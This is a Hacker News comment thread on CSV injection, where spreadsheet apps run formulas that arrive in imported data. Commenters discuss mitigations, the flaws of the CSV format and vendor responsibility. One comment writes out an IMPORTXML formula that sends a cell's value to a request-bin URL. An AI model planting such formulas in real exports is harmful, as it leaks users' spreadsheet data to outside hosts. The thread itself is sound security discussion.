top | item 15438894

Dangers of CSV Injection

645 points| rpenm | 8 years ago |georgemauer.net

188 comments

order
[+] Dylan16807|8 years ago|reply
> Well, despite plentiful advice on StackOverflow and elsewhere, I’ve found only one (undocumented) thing that works with any sort of reliability: For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

>Unfortunately that’s not the end of the story. The character might not show up, but it is still there. A quick string length check with =LEN(D4) will confirm that.

The documented way is prefixing with a ' character. It doesn't have the length issue either.

As to the root issue, I can't think of any perfect way to transfer a series of values between applications that apply different types to those values and applications that don't. At some point, something is going to have to guess.

[+] autra|8 years ago|reply
> The documented way is prefixing with a ' character. It doesn't have the length issue either.

It is suggested in comments, but the author answered

> Yes, this prevents formula expansion... once. Unfortunately Excel's own CSV exporter doesn't write the ', so if the user saves the ‘safe’ file and then loads it again all the problems are back.

:-/

[+] ballenf|8 years ago|reply
Came here to say the same. Also tested it to confirm and the single quote mark inside the double quotes does indeed force interpretation as a string instead of a formula. In both Excel and Google Sheets.

Interestingly, in Excel removing the quotes entirely also causes a formula to be interpreted as a formula and text (even with spaces) as text and numbers as numbers.

In my testing, quotes are only needed when a field contains a comma to prevent it being interpreted as a delimiter.

[+] cturner|8 years ago|reply
"transfer a series of values between applications that apply different types to those values and applications that don't"

If we thought about it as an API mechanism, we would parse the strings and apply rules to sanitise or reject it.

Here is a principle for thinking about data. Distinguish internal data structures (persistence, search) from interchange structures (APIs). Codebase A should not be able to directly access the structures of Codebase B. To communicate, they must use explicit APIs.

At the moment, this principle is not mainstream. The CSV loader is not sure if it is loading an interchange format or persistence format. Another, that happens regularly: (1) developer builds a database as a storage mechanism. (2) developer decides to have other separate codebases query into that database. Is the database an application-data-structure (interal) or an API (external)? It is acting as both.

[+] mulmen|8 years ago|reply
The applications that are communicating either have to agree on the types in advance or they have to use an interchange format that makes it explicit. If your applications don't both know the types in advance then you shouldn't be using CSV.
[+] fulafel|8 years ago|reply
I think the common model people had of CSV was that it was an imperfect way to transfer values, but safeish from code execution, XSS or "all your Google account data gets exfiltrated" type effects.
[+] jdelStrother|8 years ago|reply
That's just a single regular apostrophe? At least on my machine, with Mac Excel 15.38, if I have a CSV containing:

1,foo,'=SUM(A1:A10),bar

and open it, then the single apostrophe is visible in the cell.

[+] pavel_lishin|8 years ago|reply
Excel is the source of so many problems. At work, we ask users for an input in CSV or Excel format, and most people see "CSV" and export Excel data as CSV. Which is fine and great, but long numbers - such as UPCs - show up in Excel as scientific notation, being big scary numbers, and also get exported as such.

So when an Excel cell contains the UPC 123456123456, we get a CSV file that contains "1.23456E+11", which is worse than useless.

[+] datenwolf|8 years ago|reply
The thing that puzzles me the most is, that people use _C_SV at all. Separation by comma, or any other member of the printable subset of ASCII in the first place. What this essentially boils down to is ambiguous in-band-signalling and a contextual grammar.

ASCII had addressed the problem of separating entries ever since its creation: Separator control codes. There are:

x01 SOH "Start of Heading"

x02 STX "Start of Text"

x03 ETX "End of Text"

x04 EOT "End of Transmission"

x1C FS "File Separator"

x1D GS "Group Separator"

x1E RS "Record Separator"

x1F US "Unit Separator"

You can use those just fine for exchanging data as you would using CSV, but without the ambiguities of separation characters and the need to quote strings. Heck if payload data is limited to the subset ASCII/UTF-8 without control codes you can just dump anything without the need for escaping or quoting.

So my suggestion is simple. Don't use CSV or "P"SV (printable separated values). Use ASV (ASCII separated values).

[+] burntsushi|8 years ago|reply
This comes up every single time someone mentions CSV. Without fail. The bottom line is that CSV is human readable and writable in plain text. If you start using fancy ASCII characters, then it becomes neither because our text editors don't support it.
[+] davedx|8 years ago|reply
The article kind of addresses this. There are millions of spreadsheets and applications out in the wild that use CSV to communicate.

Sure, if you're building some kind of system where you need to ingest data from one application from another application you control, then using a different interchange format like ASV is an option. But then people tend to use more powerful formats like JSON or XML.

[+] ajdlinux|8 years ago|reply
Give me a version of every standard text editor that can let me display and edit these ASV files when I just need to quickly hack something, and sure, I'll use it. CSV is directly editable in any text editor and manipulable by standard text processing tools, that's one of its key advantages.
[+] eli|8 years ago|reply
I don't think this necessarily addresses the security vulnerabilities in the article, which involve abusing the application reading the CSV, not the file format itself.

If Excel decides that text between Start of Text and End of Text that begins with a "=" is a formula, then you're in the same spot.

[+] baldfat|8 years ago|reply
I am happy when I see I can get data via CSV over the other delivery methods people use. My local school board prints out all their data and then scans them into a PDF, ugh. I had one vendor that on purpose made the data only available in forms that would take me 600+ lines of code to clean up in mangled ASCII format.

I use CSV all the time when I am working with R. My data can come in the form of CSV, XLS, or PDF. Which would you want to work with?

I can easily look at the data. I never touch my incoming data and my output is in reports, but CSV can be the easiest way to get data into a computer.

[+] sbierwagen|8 years ago|reply
If a dev is going to use a weirdo non-CSV data interchange format, they would just use XSLX or JSON or etc etc etc.

"ASV" is only a viable option if you then also use your time machine to go back 40 years and make everyone start using it then.

[+] thepompano|8 years ago|reply
This might create some integration-related hiccups with XML, as most ASCII control characters are forbidden per the XML 1.0/1.1 specs.
[+] bitexploder|8 years ago|reply
I have been finding this vulnerability in apps since I started in infosec 10 years ago. I have seen it go any number of ways:

CSV -> import on web app -> SQLi

Malicious input -> CSV download from web app -> Excel -> formula -> sneaky data exfil

CSV -> JS -> import into web app XSS (in places no other XSS existed because of the data)

CSV import -> weird CSV header -> arbitrary data loading (headers were column names.... Schema injection .. like SQLi only more hilarious

Point is apps and devs can have blind spots (knowledge gaps) or just not think of a CSV import or export like other functionality.

[+] e1g|8 years ago|reply
We recently went through an external pentest simulating a hostile actor with inside information. We had 2 weeks to prepare and successfully defended against timing attacks, DDoS attempts, identity spoofs, request modifications, script injections etc. Passed with flying colors... except for CSV/Excel injection. Everyone looked at each other with the sheepish embarrassment of being pwned by a script kiddie. This was a total blind spot indeed, even after we reviewed every other user I/O.
[+] IncRnd|8 years ago|reply
"Input is evil" is a pretty good maxim to follow.
[+] kristofferR|8 years ago|reply
CSV is hell. Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons (who would have thought files would be shared across country borders!?), so when we open CSV files that are actually comma separated all the information is in the first cell (until a semicolon appears).

To get comma separated CSVs to show properly in Excel we have to mess around with OS language settings. CSV as a format should have died years ago, it's a shame so many apps/services only export CSV files. Many developers (mainly US/UK based) are probably not aware of how much of a headache they inflict on people in other countries by using CSV files.

[+] erik_seaberg|8 years ago|reply
A CSV importer absolutely needs to be configurable. I've seen delimiters including tabs, vertical bars, tildes, colons, and random control characters (they didn't even choose RS and US).
[+] seszett|8 years ago|reply
> Some idiot somewhere decided that Comma Separated Values in certain locales should be based on semicolons

Semicolons are really better though, because they aren't used as a decimal separator unlike commas in most countries.

I don't know about Excel, but LibreOffice allows very easily to select which parameters to use when opening a CSV file, it works just fine.

[+] pvdebbe|8 years ago|reply
The only good CSV dialect is the dif-named DSV (Delimiter Separated Values) where you select and support just one supported delimiter, and you require escaping of the delim character inside values. It's simple, it works. Quotes are hard to parse so don't use those. Just \escape.

http://www.catb.org/esr/writings/taoup/html/ch05s02.html

[+] Raticide|8 years ago|reply
What's a good alternative non-proprietary format that all major spreadsheet software supports?
[+] splike|8 years ago|reply
Interestingly, genetic biologists are probably more aware of this problem than most. When importing a CSV containing gene names such as SEPT2 or MARCH1, they automatically get converted to dates by Excel. This has potentially had a fairly large effect on research in the area [1]. One of the many reasons we insist on only using Ensembl IDs for genes at my company.

[1] https://genomebiology.biomedcentral.com/articles/10.1186/s13...

[+] jkabrg|8 years ago|reply
Slightly off-topic, but maybe we need a fully standardized and unambiguous CSV dialect with its own file extension. Or maybe just use SQLite tables or Parquet?

Some things I dislike about CSV:

* No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

* I'm not a fan of the empty field. Pandas thinks it's a floating point NaN, while R doesn't. So is it a NaN? Is it an empty string? Does it mean Not Applicable? Does it mean Don't Know? Maybe it should be removed altogether.

* No agreement about escape characters.

* No agreement about separator characters.

* No agreement about line endings.

* No agreement about encoding. Is it ASCII, or UTF-8, or UTF-16, or Latin-whatever?

* None of the choices above are made explicit in the file itself. They all have the same extension "CSV".

These use up a bit of time whenever I get a CSV from a colleague, or even when I change operating system. Sometimes I end up clobbering the file itself.

Good things: * Human readable. * Simple.

I think the addition of some rules, and a standard interpretation of them, could go some way to improving the format.

[+] kqr|8 years ago|reply
See, one of the reasons CSV managed to get so ubiquitous is precisely because all those things are unspecified. CSV is not a popular format; CSV is the name we give 960 visually similar but very different formats that as a collective are popular.

The thing you use CSV for is not it's technical merit. You use CSV for its ubiquity. If you nailed down all those things you talk about, you would have a much, much smaller user base and there would be no reason to use CSV in the first place.

(Hey, this reminds me of a similar situation governing s/CSV/C/g...)

[+] johnwilkesbooth|8 years ago|reply
> No distinction between categorical data and strings. R thinks your strings are categories, and Pandas thinks your categories are strings.

I think this is more of an R-ism than a standardization issue. Strings are a pretty universal data type, where as categorical data (factors) are mostly specific to the domain of statistical modeling. IMO Python is doing the correct thing here. Personally I find factors to be more trouble than they are worth, and fortunately `data.table::fread` mimics Python in this regard.

[+] f00_|8 years ago|reply
.parquet fam, it's all about columnar data stores now
[+] fulafel|8 years ago|reply
This is foremost a vulnerability in Excel and Google Sheets, like the article concludes, though it warrants workarounds in CSV producers.

Why would these apps go off executing code from a text file? How odd.

Is there a way to tell Excel or Sheets to open a CSV file without executing code?

[+] top_post|8 years ago|reply
Sorry to balk, but I'm more outraged at the title, another injection I need to talk about that isn't really the case. The root cause is the interpreter executing untrusted input, the same can be said about macros or any other file type. The perception being most people open CSV files on a regular basis and perceive them to be safe or not interpreted when it appears they are.
[+] bitexploder|8 years ago|reply
Well, it catches folks by surprise. We could abstract all computer vulns down to a few broad computing concepts, but that isn't as useful.

This one is your data turned out to be code. There are many, many books on all the various forms this takes. Memory corruption cat and mouse..... It is a long complex story that we can sweep up to that generalization. But it is important to know that high, medium, and low level of these issues. They form a gigantic tree. The medium level somewhere between is where devs need to threat model most of the time. But some of the time things are very specific and you just need to know about the specific thing and not it's various generalized forms, because the specific thing can really matter. E.g. simple programming mistakes lead to side channels, etc. We can generically understand a side channels easily. But it takes a ton of specific hard earned knowledge to avoid it.

[+] Cyranix|8 years ago|reply
This seems like an appropriate place to suggest that anyone who finds these kinds of attack vectors interesting should check out the bug bounty program for my current place of work, which processes loads of CSV and Excel files from government customers.

https://bugcrowd.com/socrata

(But please, just do me a small favor and don't submit any reports for SQL injection or information disclosure if you're using the SQL-like API that we expressly provide for the purpose of accessing public data. We get a couple clueless people sending such reports every week.)

[+] Swizec|8 years ago|reply
This brings XSS to a whole new level. Imagine what happens if you know some of what you post in a website as a user eventually gets reviewed by somebody who gets it through a CSV dump.

Makes me wanna troll ops people at my own startup just for funsies.

[+] _betty_|8 years ago|reply
this used to be common with txt files and IE's terrible practice of sniffing content. It would see a txt file that contained html and display the html instead, it could then pull in a secret silverlight file that was mascarading as a docx file as they are both simply zip files. Even more amusingly silverlight and docx contents don't clash so it could still be a valid docx file if you opened it, and the txt file would look like txt even though it was really rendering html with a hidden silverlight app.
[+] Mortiffer|8 years ago|reply
Incase anyone else was wondering about Google Forms : I tried inputting =IMPORTXML(CONCAT("https://requestb.in/15z4vk51?f=",H8),"//a") into a text field and google automatically appends a "'" such that '=IMPORTXML does not execute
[+] jaclaz|8 years ago|reply
At least here (Italy) CSV is not commonly used (because of the different way we use the comma as a decimal point) and the default (in Excel) separator is then set to a semi-colon.

A more common format is TSV (TAB delimited) which makes a lot more sense, however the best choice when importing data in Excel is still to change the file extension to a non-recognized extension (like - say - .txt) and in the "import wizard" set the appropriate separator and set all columns as "text".

[+] captn3m0|8 years ago|reply
On the first attack vector: Google Security has a nice post about it [0] and why they do not consider it a valid threat. This is their reasoning:

>CSV files are just text files (the format is defined in RFC 4180) and evaluating formulas is a behavior of only a subset of the applications opening them - it's rather a side effect of the CSV format and not a vulnerability in our products which can export user-created CSVs. This issue should mitigated by the application which would be importing/interpreting data from an external source, as Microsoft Excel does (for example) by showing a warning. In other words, the proper fix should be applied when opening the CSV files, rather then when creating them.

[0]: https://sites.google.com/site/bughunteruniversity/nonvuln/cs...

Their policy makes it sound like that the second vulnerability should indeed be fixed in Google Sheets itself (it is the one opening the file, after all)

[+] jonnycomputer|8 years ago|reply
CSV is a mess (are a mess?), but all these vulnerabilities have to do with spreadsheet applications' consumption of CSVs. There are very legitimate reasons a CSV might include fragments of potentially executable code, after all.
[+] filereaper|8 years ago|reply
I'd be curious if anyone has hit exploits with CSV files and bulk ingestion into datawarehouses (eg Redshift, Greenplum, etc..) as opposed to Excel.

CSVs are still the most portable format for moving data around despite all of their evils of escaping characters, comma delimitation, etc...

A lot of old legacy systems know CSV and its easy to inspect visually as compares to more efficient binary formats like ORC or Paquet.

[+] tatersolid|8 years ago|reply
Like it or not, Excel’s behavior defines the CSV file format and how it is used in the real world. The writing of an RFC 15 years too late has not and will never “fix” CSV. It’s crusted over over with bugs and inconsistencies for all time.

Use anything else, even XLSX which is at least a typed and openly standardized format.

[+] stepri|8 years ago|reply
When you import a CSV file into Google Sheets (File -> Import), you can choose in the dialog to convert text to numbers and dates. If you choose not to convert, Google Sheets places a single quote (') before the function.
[+] ecesena|8 years ago|reply
Does anybody know any good library that solve the problem, in any language?
[+] ComodoHacker|8 years ago|reply
My Excel 2010 doesn't execute shell code from author's example. Heck, it doesn't even parse CSV and loads everything into one column as text. What am I doing wrong?
[+] randkyp|8 years ago|reply
As weird as it sounds, it might be related to your system region settings, specifically the decimal point sign and the thousands separator sign. I've been only able to open CSVs by manually importing them with Excel's 'import data from text file' function.
[+] tyingq|8 years ago|reply
It does depend on using the csv file extension. Anything else brings up the import wizard.